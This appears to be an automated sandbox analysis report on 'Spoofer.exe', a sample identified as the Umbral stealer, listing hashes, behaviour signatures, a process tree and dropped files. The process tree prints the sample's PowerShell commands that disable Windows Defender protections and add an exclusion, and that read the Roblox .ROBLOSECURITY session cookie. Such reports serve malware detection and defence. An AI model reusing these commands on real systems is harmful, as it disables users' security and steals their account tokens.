Overview

overview

10

Static

static

10

Spoofer.exe

windows10-1703-x64

10

Analysis

  • max time kernel
    40s
  • max time network
    58s
  • platform
    windows10-1703_x64
  • resource
    win10-20240611-en
  • resource tags

    arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
  • submitted
    10-07-2024 21:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Spoofer.exe

  • Size

    254KB

  • MD5

    f472ad2223ee5bc9619f36e2547ef3a6

  • SHA1

    da1d05ba368c36a18920f466cb83f665f7afc440

  • SHA256

    36c0e34d73f51cda52a92a638cf821847fd3c8efd87350eeb874dbc8a94c1927

  • SHA512

    a1ed5b049867ffd019f10a8d4b5ffc7bda6fcbfd9f2c5850ce620d848a18d2ac64ec36f39b9469759c7c1f3ff40331829af59c645d7be7d2834586b854c92a67

  • SSDEEP

    6144:K4oZoAeVHPtHgTIAaZgCwDx7axHU0unC28ejI8d7:xoZyHPvWCwjXCsIQ

Score
10/10
umbralexecutionspywarestealer

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Drops file in Drivers directory 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\Spoofer.exe
    "C:\Users\Admin\AppData\Local\Temp\Spoofer.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4488
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:304
    • C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Spoofer.exe"
      2⤵
      • Views/modifies file attributes
      PID:4244
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Spoofer.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2928
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:3688
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:4964
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:2608
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
        PID:4756
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        2⤵
          PID:4204
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          2⤵
            PID:3036
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:3928
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic" path win32_VideoController get name
            2⤵
            • Detects videocard installed
            PID:5104
        • C:\Windows\System32\rundll32.exe
          C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
          1⤵
            PID:1312

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            3KB

            MD5

            8592ba100a78835a6b94d5949e13dfc1

            SHA1

            63e901200ab9a57c7dd4c078d7f75dcd3b357020

            SHA256

            fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

            SHA512

            87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            1b5df20804d1c95783d32c750689c49f

            SHA1

            1d2fd1fea30d7fc09d00d57705c5b70fd470f51b

            SHA256

            bd865fb0ee59a16d8df985a43dbc179dc98a6514b28a6697c2e81bb4170b2804

            SHA512

            48f0148e19bb89a415fbe82efac9c6bd892e8d544b8886db6d8d296d79a67057a8262948b86496a53fbfc51f9e7ade329b9dbfcd602829a59549dd56a20ffca6

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            c0278d3b47cf401aba9f3c11c02c1818

            SHA1

            91d2a4dea01a786ab4bddaf1cd0927b8bece1747

            SHA256

            fb85bf5e9c75ceb6cc9806d95109b22b9bf41cd92c3452f8f0742b9f6ad89a3b

            SHA512

            1f5aab4515faf3ed480ab77fe8113748fee65c361731c6bb4f730c8de108bedabf72fe3d14934d23030aafe87f21397633e3e255959f317731899ff683b66b75

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            d3c50d929cf3a1a057f9b2862cd20df1

            SHA1

            c8067ee54d074bed6ede382933bad73981a17ce0

            SHA256

            178f684f57a5dfb637293bbecfa86c6b7e122227610d10b56ccd0681d3d1d4a4

            SHA512

            1b9575efa748dc95441d5212957b0edbad2dc4657214f0aef8cb8f48bb4da4b2079d318cf235ae75bb1446e15af54fa8550bf79a7d3c79a67c4f37b8a608ba5f

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            e89a38aa646eefea123dea9fcc792c03

            SHA1

            6324edb14b2844618f66d8c6327cfa017c796c7d

            SHA256

            573a66b7d1264cb0149fbfdc4b3e8e9fc73dbdca915281694a01c099bacec7d7

            SHA512

            c42bd2d7d07c31b693e6e467985da05248e4bc6797fecbfe9696edefb85e4ad9d672c67e2ec5f8163ee5029c9cca32db47e38d79c15326addf48141bd75ff0b5

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cmd22u4g.3cw.ps1
            Filesize

            1B

            MD5

            c4ca4238a0b923820dcc509a6f75849b

            SHA1

            356a192b7913b04c54574d18c28d46e6395428ab

            SHA256

            6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

            SHA512

            4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

            Download Submit

          • memory/2928-8-0x00000254A17D0000-0x00000254A17F2000-memory.dmp

            Filesize

            136KB

            Download

          • memory/2928-11-0x00000254A1980000-0x00000254A19F6000-memory.dmp

            Filesize

            472KB

            Download

          • memory/4488-3-0x00007FF8C0600000-0x00007FF8C0FEC000-memory.dmp

            Filesize

            9.9MB

            Download

          • memory/4488-0-0x00007FF8C0603000-0x00007FF8C0604000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4488-80-0x0000024DE87B0000-0x0000024DE8800000-memory.dmp

            Filesize

            320KB

            Download

          • memory/4488-81-0x0000024DE8820000-0x0000024DE883E000-memory.dmp

            Filesize

            120KB

            Download

          • memory/4488-2-0x00007FF8C0600000-0x00007FF8C0FEC000-memory.dmp

            Filesize

            9.9MB

            Download

          • memory/4488-146-0x0000024DE86B0000-0x0000024DE86BA000-memory.dmp

            Filesize

            40KB

            Download

          • memory/4488-147-0x0000024DE86E0000-0x0000024DE86F2000-memory.dmp

            Filesize

            72KB

            Download

          • memory/4488-1-0x0000024DCE040000-0x0000024DCE086000-memory.dmp

            Filesize

            280KB

            Download